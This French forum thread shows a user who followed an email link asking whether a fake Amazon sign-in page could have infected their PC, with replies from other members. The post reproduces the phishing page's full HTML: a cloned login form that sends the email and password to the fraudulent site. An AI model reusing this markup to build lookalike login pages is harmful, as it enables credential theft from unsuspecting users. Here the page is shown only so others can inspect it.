Vérification code frauduleux

Messages postés
1
Date d'inscription
mardi 13 août 2019
Statut
Membre
Dernière intervention
13 août 2019
- - Dernière réponse : lolomusic667
Messages postés
1495
Date d'inscription
lundi 22 août 2016
Statut
Membre
Dernière intervention
17 août 2019
- 17 août 2019 à 18:51
Bonjour,

Aujourd'hui en cliquant trop vite sur un mail j'ai accéder à un lien sans vérifier le destinataire...
Le lien m'a envoyé sur une page web frauduleuse, me demandant de me connecter pour vérifier mon compte amazon, ce que je n'ai pas fais.
Ma question est : pouvez-vous jeter un œil au code HTML afin de savoir si c'est du simple phishing ou s'il est possible que l'ouverture de la page HTML est pu contaminer mon PC via un virus, malware, espion..


Depuis le module d'inspection du navigateur j'ai pu constater qu'il utilisait les cookies : PHPSESSID

<!doctype html><html class="a-no-js" data-19ax5a9jf="dingo"><head><script
type='text/javascript'>var ue_t0=ue_t0||+new Date();</script><meta charset="utf-8"><link
rel='icon' href='../assets/img/amazon.png'><title dir="ltr">Connexion Amazon</title><link
rel="stylesheet" href="../assets/css/main.css" /></head><body class="ap-locale-en_US a-mus
a-aui_149818-c a-aui_152852-c a-aui_157141-c a-aui_158613-c a-aui_160684-c aaui_
57326-c a-aui_72554-c a-aui_accessibility_49860-c a-aui_attr_validations_1_51371-c
a-aui_bolt_62845-c a-aui_perf_130093-c a-aui_tnr_v2_180836-c a-aui_ux_113788-c aaui_
ux_114039-c a-aui_ux_138741-c a-aui_ux_145937-c a-aui_ux_60000-c"><div id="apage"><
div class="a-section a-padding-medium auth-workflow"><div class="a-section aspacing-
none auth-navbar"><div class="a-section a-spacing-medium a-text-center"><a
class="a-link-nav-icon" tabindex="-1" href="/ref=ap_frn_logo"><i class="a-icon aicon-
logo" role="img" aria-label="Amazon"></i></a></div></div><div id="authportalcenter-
section" class="a-section"><div id="authportal-main-section" class="a-section"><div
class="a-section auth-pagelet-container">
<div class="a-section a-spacing-base">
<div class="a-section">
<form name="signIn" method="post" novalidate
action="login?session=ce689873e3ef4f3baf66b6f33d2adcf65e846267" class="authvalidate-
form auth-real-time-validation a-spacing-none">
<div class="a-section">
<div class="a-box">
<div class="a-box-inner a-padding-extra-large">
<h1 class="a-spacing-small">
Identifiez-vous </h1>
<!-- optional subheading element -->
<div class="a-row a-spacing-base">
<label for="ap_email" class="a-form-label">
Adresse e-mail ou numéro de téléphone portable </label>
<input type="email" maxlength="128" id="ap_email" name="emailLogin" tabindex="1"
class="a-input-text a-span12 auth-autofocus auth-required-field">
<div id="auth-email-missing-alert" class="a-box a-alert-inline a-alert-inline-error authinlined-
error-message a-spacing-top-mini" aria-live="assertive" role="alert">
<div class="a-box-inner a-alert-container">
<i class="a-icon a-icon-alert"></i>
<div class="a-alert-content">
Enter your email or mobile phone number
</div>
</div>
</div>
</div>
<input type="hidden" name="create" value="0">
<div class="a-section a-spacing-large">
<div class="a-row">
<div class="a-column a-span5">
<label for="ap_password" class="a-form-label">
Mot de passe
</label>
</div>
<div class="a-column a-span7 a-text-right a-span-last">
<a id="auth-fpp-link-bottom" class="a-link-normal" tabindex="3"
href="https://www.amazon.com/ap/forgotpassword?showRememberMe=true&openid.
pape.max_auth_age=0&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%
2F2.0%2Fidentifier_select&pageId=usflex&openid.return_to=https%3A%2F%2F
www.amazon.com%2F%3Fref_%3Dnav_ya_signin&prevRID=5E2S0M02YQK0KW
XY6QRW&openid.assoc_handle=usflex&openid.mode=checkid_setup&pre
populatedLoginId=&failedSignInCount=0&openid.claimed_id=http%3A%2F%2F
specs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fs
pecs.openid.net%2Fauth%2F2.0">
Mot de passe oublié</a>
</div>
</div>
<input type="password" id="ap_password" name="passwordLogin" tabindex="2" class="ainput-
text a-span12 auth-required-field">
<div id="auth-password-missing-alert" class="a-box a-alert-inline a-alert-inline-error authinlined-
error-message a-spacing-top-mini" aria-live="assertive" role="alert">
<div class="a-box-inner a-alert-container">
<i class="a-icon a-icon-alert"></i>
<div class="a-alert-content">
Enter your password
</div>
</div>
</div>
</div>
<div class="a-section a-spacing-extra-large">
<span class="a-button a-button-span12 a-button-primary">
<span class="a-button-inner">
<input id="signInSubmit" tabindex="5" class="a-button-input" type="submit">
<span class="a-button-text" aria-hidden="true">
Identifiez-vous </span>
</span>
</span>
<div class="a-row a-spacing-top-medium">
<div class="a-section a-text-left">
<label for="auth-remember-me" class="a-form-label">
<div data-a-input-name="rememberMe" class="a-checkbox">
<label>
<input type="checkbox" name="rememberMe" value="true" tabindex="4">
<i class="a-icon a-icon-checkbox"></i>
<span class="a-label a-checkbox-label">
Maintenir ma session ouverte.
<span class="a-declarative" data-action="a-popover" data-apopover="{&
quot;activate":"onclick","header":"\"
;Keep Me Signed In\"
Checkbox","inlineContent":"<p>Choosing \"Keep me
signed in\" reduces the number of times you're asked to sign in on this
device.<\/p>\n<p>To keep your account secure, use this option only on your
personal devices.<\/p>"}">
<a id="remember_me_learn_more_link" href="javascript:void(0)" class="a-popover-trigger
a-declarative">
Détails
<i class="a-icon a-icon-popover"></i>
</a>
</span>
</span>
</label>
</div>
</label>
</div>
</div>
</div>
<div class="a-divider a-divider-break">
<h5>Nouveau chez Amazon ?</h5>
</div>
<span id="auth-create-account-link" class="a-button a-button-span12 a-button-base">
<span class="a-button-inner">
<a id="createAccountSubmit" tabindex="6"
href="https://www.amazon.com/ap/register?showRememberMe
=true&openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.
amazon.com%2F%3Fref_%3Dnav_ya_signin&prevRID=5E2S0M02YQK0KWXY6Q
RW&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifie
r_select&openid.assoc_handle=usflex&openid.mode=checkid_setup&prepop
ulatedLoginId=&failedSignInCount=0&openid.claimed_id=http%3A%2F%2Fspe
cs.openid.net%2Fauth%2F2.0%2Fidentifier_select&pageId=usflex&openid.ns=htt
p%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0" class="a-button-text" role="button">
Créer votre compte Amazon </a>
</span>
</span>
</div>
</div>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
<div id="right-2"></div>
<div class="a-section a-spacing-top-extra-large auth-footer">
<div class="a-divider a-divider-section">
<div class="a-divider-inner"></div>
</div>
<div class="a-section a-spacing-small a-text-center a-size-mini">
<span class="auth-footer-seperator"></span>
<a class="a-link-normal" target="_blank" rel="noopener"
href="/gp/help/customer/display.html/ref=ap_desktop_fo
oter_cou?ie=UTF8&nodeId=508088">
Conditions d'utilisation </a>
<span class="auth-footer-seperator"></span>
<a class="a-link-normal" target="_blank" rel="noopener"
href="/gp/help/customer/display.html/ref=ap_desktop_fo
oter_privacy_notice?ie=UTF8&nodeId=468496">
Vos informations personnelles </a>
<span class="auth-footer-seperator"></span>
<a class="a-link-normal" target="_blank" rel="noopener" href="/help">
Aide </a>
<span class="auth-footer-seperator"></span>
</div>
<div class="a-section a-spacing-none a-text-center">
<span class="a-size-mini a-color-secondary">
© 1996-2019, Amazon.com, Inc. or its affiliates</span>
</div>
</div>
</div>
<div id="auth-external-javascript" class="auth-external-javascript" data-externaljavascripts=""></
div>
<!-- cache slot rendered -->
</div>
<div id='be' style="display:none;visibility:hidden;">
<form name='ue_backdetect' action="get">
<input type="hidden" name='ue_back' value='1' />
</form>
</div></body></html>
Afficher la suite 

3 réponses

Meilleure réponse
Messages postés
23252
Date d'inscription
samedi 22 octobre 2005
Statut
Modérateur
Dernière intervention
17 août 2019
1685
1
Merci
lut;)
pas tout compris à ta question ...
Aujourd'hui en cliquant trop vite sur un mail j'ai accéder à un lien sans vérifier le destinataire...
Le lien m'a envoyé sur une page web frauduleuse, me demandant de me connecter pour vérifier mon compte amazon, ce que je n'ai pas fais.
Ma question est : pouvez-vous jeter un œil au code HTML afin de savoir si c'est du simple phishing ou s'il est possible que l'ouverture de la page HTML est pu contaminer mon PC via un virus, malware, espion..

Si tu n'as vraiment pas ouverte cette page ... = rien à craindre !!!
MAIS ALORS COMMENT AS TU EU LE CODE SOURCE DE LA PAGE ???
Tu pourrais peut-être t’inquiéter beaucoup plus SI tu avais rempli ceci:
<label for="ap_email" class="a-form-label">
Adresse e-mail ou numéro de téléphone portable </label>
<input type="email" maxlength="128" id="ap_email" name="emailLogin" tabindex="1"
class="a-input-text a-span12 auth-autofocus auth-required-field">
<div id="auth-email-missing-alert" class="a-box a-alert-inline a-alert-inline-error authinlined-
error-message a-spacing-top-mini" aria-live="assertive" role="alert">
<div class="a-box-inner a-alert-container">
<i class="a-icon a-icon-alert"></i>
<div class="a-alert-content">
Enter your email or mobile phone number
</div>
</div>
</div>
</div>
<input type="hidden" name="create" value="0">
<div class="a-section a-spacing-large">
<div class="a-row">
<div class="a-column a-span5">
<label for="ap_password" class="a-form-label">
Mot de passe
</label>

et continué la procédure ....

Dire « Merci » 1

Heureux de vous avoir aidé ! Vous nous appréciez ? Donnez votre avis sur nous ! Evaluez CommentCaMarche

CCM 57548 internautes nous ont dit merci ce mois-ci

lolomusic667
Messages postés
1495
Date d'inscription
lundi 22 août 2016
Statut
Membre
Dernière intervention
17 août 2019
7 -
je crois en faisant clic droit sur la page puis inspecter.
Commenter la réponse de bg62
Messages postés
1495
Date d'inscription
lundi 22 août 2016
Statut
Membre
Dernière intervention
17 août 2019
7
0
Merci
Bonjour,

Je crois que ça renvoie aux informations de l'identifiant de la session, en l’occurrence ici: amazon.
Commenter la réponse de lolomusic667
Messages postés
14853
Date d'inscription
vendredi 28 avril 2017
Statut
Membre
Dernière intervention
17 août 2019
2246
0
Merci
Bonjour ,
Sans l'ouverture du mail aucun risque.
A+
lolomusic667
Messages postés
1495
Date d'inscription
lundi 22 août 2016
Statut
Membre
Dernière intervention
17 août 2019
7 -
apparemment, il a ouvert le mail.
Commenter la réponse de MPMP10